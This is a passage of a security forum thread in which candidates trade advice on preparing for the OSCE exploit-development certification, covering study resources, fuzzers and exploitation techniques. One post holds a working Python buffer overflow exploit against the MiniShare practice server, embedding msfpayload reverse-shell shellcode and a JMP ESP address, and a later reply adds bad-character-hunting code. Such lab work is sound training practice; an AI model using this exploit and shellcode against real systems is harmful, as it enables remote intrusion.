OSCE advice?

caissyd
Hero Member
Posts: 894
Joined: Thu Dec 31, 2009 11:20 am
Location: Ottawa, Canada
Post Wed Feb 06, 2013 1:37 pm

OSCE advice?

Hi,

For those who are already certified, what advice would you give to someone like me who is starting the Cracking the Perimeter course in order to later challenge the OSCE certification?

I have read some stories here and on the internet, but I am curious about what you have done to succeed and what you would change if you were to do it again.

Thanks in advance for your help
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

UNIX
Hero Member
Posts: 1244
Joined: Mon Apr 28, 2008 9:20 am
Post Wed Feb 06, 2013 2:09 pm

Re: OSCE advice?

I listed a couple of useful resources in my review, when I did the OSCE a couple of months ago:



Certainly more than needed for the OSCE exam, though.

I'd recommend getting a couple of vulnerable programs and trying to discover and exploit the vulnerabilities yourself. For appropriate targets you could refer to exploit-db and similar sites. A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

The labs can easily be recreated at home, in case you are considering enrolling again for some lab time. Also feel free to ask any specific questions that may arise while you go through the materials. ;)

caissyd
Hero Member
Posts: 894
Joined: Thu Dec 31, 2009 11:20 am
Location: Ottawa, Canada
Post Wed Feb 06, 2013 2:11 pm

Re: OSCE advice?

UNIX wrote: A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

Thanks UNIX. But what do you mean by "utilize different exploitation techniques"?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

hayabusa
Hero Member
Posts: 1662
Joined: Mon Jan 29, 2007 2:59 pm
Post Wed Feb 06, 2013 2:16 pm

Re: OSCE advice?

I'll second UNIX on all counts.  And likewise, if you need help, drop me a line.

Ultimately, dupe as much as you can, both from the course, and from outside of it.  The more you understand, and can do without too much difficulty, the better.  

Practice, practice, practice.

As you replied to UNIX's post, before I posted - By 'different techniques', try to find OTHER ways to exploit flaws that are noted in the course materials or what you work with from exploit-db, beyond simply using the publicly available exploits.  Also, try to learn how to do things for yourself, rather than simply mimicking / copying exactly what someone has done.  Try to accomplish the same thing, without simply doing exactly as they did.  This applies to both coding and non-coding exercises (such as some of the web exploitation stuff).
Last edited by hayabusa on Wed Feb 06, 2013 2:18 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

UNIX
Hero Member
Posts: 1244
Joined: Mon Apr 28, 2008 9:20 am
Post Wed Feb 06, 2013 2:20 pm

Re: OSCE advice?

For example, you could try to utilize a SEH overwrite in order to get to your shellcode, if the public exploit doesn't take this approach (and if it is applicable to the target application). Another example would be to port the exploit to newer operating systems, which will most likely result in different approaches that are necessary in order to get your shellcode executed when facing increased exploit mitigations, such as DEP, ASLR, etc.

Dark_Knight
Sr. Member
Posts: 294
Joined: Mon Aug 11, 2008 7:03 pm
Post Wed Feb 06, 2013 2:25 pm

Re: OSCE advice?

Which fuzzer framework would you all recommend? Spike or Peach or ???
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com

UNIX
Hero Member
Posts: 1244
Joined: Mon Apr 28, 2008 9:20 am
Post Wed Feb 06, 2013 2:32 pm

Re: OSCE advice?

It depends on what you want to fuzz, e.g. file formats or a network protocol. For commercial fuzzers I'd recommend taking a look at Defensics and beSTORM. As for the free ones, I like Peach, although it takes quite a while until one gets used to it. I also had good results with FOE2.

Eventually it won't hurt to write your own fuzzers though. ;)
Last edited by UNIX on Mon Feb 11, 2013 1:10 pm, edited 1 time in total.

dynamik
Recruiters
Posts: 1119
Joined: Sun Nov 09, 2008 11:00 am
Location: Mile High City
Post Wed Feb 06, 2013 2:47 pm

Re: OSCE advice?

I can't elaborate without providing spoilers, but I wish I would have gone through this in advance: http://www.amazon.com/Advanced-Windows- ... 0321374460
The day you stop learning is the day you start becoming obsolete.

Dark_Knight
Sr. Member
Posts: 294
Joined: Mon Aug 11, 2008 7:03 pm
Post Wed Feb 06, 2013 6:25 pm

Re: OSCE advice?

Ok so can somebody shed some light on this. I am trying to exploit the minishare app from the greycorner. It is a simple buffer overflow exploit. I have already done it the regular way i.e. jmp esp.

However here is what I am trying,

#!/usr/bin/python

import socket

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 R |msfencode -a x86 -b "\x00" -t c
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

shell_reverse_tcp = ("\xba\xe7\x88\x98\x9a\xd9\xc3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x4f\x31\x50\x14\x03\x50\x14\x83\xc0\x04\x05\x7d\x64\x72\x40"
"\x7e\x95\x83\x32\xf6\x70\xb2\x60\x6c\xf0\xe7\xb4\xe6\x54\x04"
"\x3f\xaa\x4c\x9f\x4d\x63\x62\x28\xfb\x55\x4d\xa9\xca\x59\x01"
"\x69\x4d\x26\x58\xbe\xad\x17\x93\xb3\xac\x50\xce\x3c\xfc\x09"
"\x84\xef\x10\x3d\xd8\x33\x11\x91\x56\x0b\x69\x94\xa9\xf8\xc3"
"\x97\xf9\x51\x58\xdf\xe1\xda\x06\xc0\x10\x0e\x55\x3c\x5a\x3b"
"\xad\xb6\x5d\xed\xfc\x37\x6c\xd1\x52\x06\x40\xdc\xab\x4e\x67"
"\x3f\xde\xa4\x9b\xc2\xd8\x7e\xe1\x18\x6d\x63\x41\xea\xd5\x47"
"\x73\x3f\x83\x0c\x7f\xf4\xc0\x4b\x9c\x0b\x05\xe0\x98\x80\xa8"
"\x27\x29\xd2\x8e\xe3\x71\x80\xaf\xb2\xdf\x67\xd0\xa5\xb8\xd8"
"\x74\xad\x2b\x0c\x0e\xec\x23\xe1\x3c\x0f\xb4\x6d\x37\x7c\x86"
"\x32\xe3\xea\xaa\xbb\x2d\xec\xcd\x91\x89\x62\x30\x1a\xe9\xab"
"\xf7\x4e\xb9\xc3\xde\xee\x52\x14\xde\x3a\xf4\x44\x70\x95\xb4"
"\x34\x30\x45\x5c\x5f\xbf\xba\x7c\x60\x15\xcd\xbb\xf7\x56\x66"
"\x42\x6c\x3f\x75\x44\x7d\xe3\xf0\xa2\x17\x0b\x55\x7d\x80\xb2"
"\xfc\xf5\x31\x3a\x2b\x9d\xd2\xa9\xb0\x5d\x9c\xd1\x6e\x0a\xc9"
"\x24\x67\xde\xe7\x1f\xd1\xfc\xf5\xc6\x1a\x44\x22\x3b\xa4\x45"
"\xa7\x07\x82\x55\x71\x87\x8e\x01\x2d\xde\x58\xff\x8b\x88\x2a"
"\xa9\x45\x66\xe5\x3d\x13\x44\x36\x3b\x1c\x81\xc0\xa3\xad\x7c"
"\x95\xdc\x02\xe9\x11\xa5\x7e\x89\xde\x7c\x3b\xb9\x94\xdc\x6a"
"\x52\x71\xb5\x2e\x3f\x82\x60\x6c\x46\x01\x80\x0d\xbd\x19\xe1"
"\x08\xf9\x9d\x1a\x61\x92\x4b\x1c\xd6\x93\x59")

# stack jmp  \xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1
jmp_back = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"

# jmp esp \x7E\x42\x93\x53 USER32.dll
jmp_esp = "\x53\x93\x42\x7E"

expl = "\x41" * 1271 + "\x42" * 517 + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361

buff = "GET" + expl + "HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = sock.connect(("192.168.1.124",80))
sock.send(buff)
sock.close()



The jmp_esp takes me to our buffer, where we could inject shellcode. However, I decided to try and jump back approx. 512 bytes and try to execute the shellcode there.

However no dice......... Thoughts :)
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com

caissyd
Hero Member
Posts: 894
Joined: Thu Dec 31, 2009 11:20 am
Location: Ottawa, Canada
Post Wed Feb 06, 2013 7:08 pm

Re: OSCE advice?

Great, thanks for these great responses!

I get the point regarding exploit development: practice all the techniques often and in different conditions.

I will also have a good look at the book you proposed ajohnson!

But what about the other things (web app, router, etc.)? What do you guys recommend or wish you would have done before the exam? I know I need to practice fuzzing web apps more, that's for sure, and I was planning on playing with the DVWA and other things like that. But what else would you recommend?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

dynamik
Recruiters
Posts: 1119
Joined: Sun Nov 09, 2008 11:00 am
Location: Mile High City
Post Wed Feb 06, 2013 8:20 pm

Re: OSCE advice?

@DK: I assume you're not sending the shellcode because it doesn't make it there. Otherwise, that would be your first problem ;D

You haven't got all the bad characters out, and even after that, you're not jumping back far enough. You'll currently land in the middle of the shellcode once you correct the characters.

x = ''
for i in range(0, 256):
    # double backslash: build the escaped "\x00\x01..." text form,
    # ready to paste into the exploit's source as a string literal
    x += "\\x%02x" % i
print(x)

will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn't work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you're feeling ambitious. There's an example in the courseware.



@HM: There isn't any web app fuzzing; you're fuzzing servers. The course actually covers what you need to know for that. Also, be sure to check out the additional resources in the forums. There are decent lists for most, if not all, modules.
Last edited by dynamik on Wed Feb 06, 2013 8:26 pm, edited 1 time in total.
The day you stop learning is the day you start becoming obsolete.
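Added example, not code from the thread: the compare-what-landed-with-what-was-sent check dynamik describes above, written as a small offline script. The victim process is replaced by simulated_target, a constructed filter; in real use the observed bytes would come from the memory dump taken at the breakpoint (e.g. with pydbg), and the script would loop send, dump, compare, exclude until a whole probe survives.

```python
ALL_BYTES = bytes(range(256))

def make_probe(excluded=()):
    """Probe of every byte value except those already known to be bad."""
    return bytes(b for b in ALL_BYTES if b not in excluded)

def as_escaped(data):
    """Render a probe in the "\\x00\\x01..." source form dynamik's loop prints,
    ready to paste into a Python string literal."""
    return "".join("\\x%02x" % b for b in data)

def compare(sent, observed):
    """Walk the probe as sent against what landed in memory. Returns
    (first_suspect_byte, reason), or (None, "ok") if everything survived.
    Only the first mismatch is meaningful: once a byte is dropped or the copy
    stops, everything after it is shifted or missing, so exclude it and
    resend before trusting any later difference."""
    for i, b in enumerate(sent):
        if i >= len(observed):
            return b, "truncated"   # copy stopped here, e.g. NUL ended a strcpy
        if observed[i] != b:
            return b, "mangled"     # byte changed or dropped (shifts the rest)
    return None, "ok"

def find_bad_chars(target, max_rounds=256):
    """Repeat send -> compare -> exclude until a whole probe survives.
    `target` maps a probe to the bytes observed in memory (here a simulation;
    in practice the dump taken at the breakpoint)."""
    bad = []
    for _ in range(max_rounds):
        probe = make_probe(bad)
        suspect, reason = compare(probe, target(probe))
        if suspect is None:
            break
        bad.append(suspect)
    return bad

def simulated_target(data):
    """Constructed stand-in for the victim: a line parser that drops CR and
    ends the line at LF, stored via a NUL-terminated string copy."""
    out = bytearray(0x00 if b == 0x0a else b for b in data if b != 0x0d)
    return bytes(out.split(b"\x00")[0])

if __name__ == "__main__":
    bad = find_bad_chars(simulated_target)
    print("bad chars:", as_escaped(bytes(bad)))            # \x00\x0a\x0d
    print("clean probe:", as_escaped(make_probe(bad)))
```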

DragonGorge
Jr. Member
Posts: 86
Joined: Wed Feb 08, 2012 6:30 pm
Post Wed Feb 06, 2013 8:53 pm

Re: OSCE advice?

ajohnson wrote: I can't elaborate without providing spoilers

Hey ajohnson... last I saw you had WIP:OSCE in your sig. You're not already done and on to the next cert are you? If so... :o

dynamik
Recruiters
Posts: 1119
Joined: Sun Nov 09, 2008 11:00 am
Location: Mile High City
Post Wed Feb 06, 2013 9:27 pm

Re: OSCE advice?

DragonGorge wrote: Hey ajohnson... last I saw you had WIP:OSCE in your sig. You're not already done and on to the next cert are you? If so... :o

Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.
The day you stop learning is the day you start becoming obsolete.

MaXe
Hero Member
Posts: 671
Joined: Tue Aug 17, 2010 9:49 am
Post Wed Feb 06, 2013 9:32 pm

Re: OSCE advice?

I'm an InterN0T'er

DragonGorge
Jr. Member
Posts: 86
Joined: Wed Feb 08, 2012 6:30 pm
Post Wed Feb 06, 2013 9:35 pm

Re: OSCE advice?

ajohnson wrote: Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.

Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?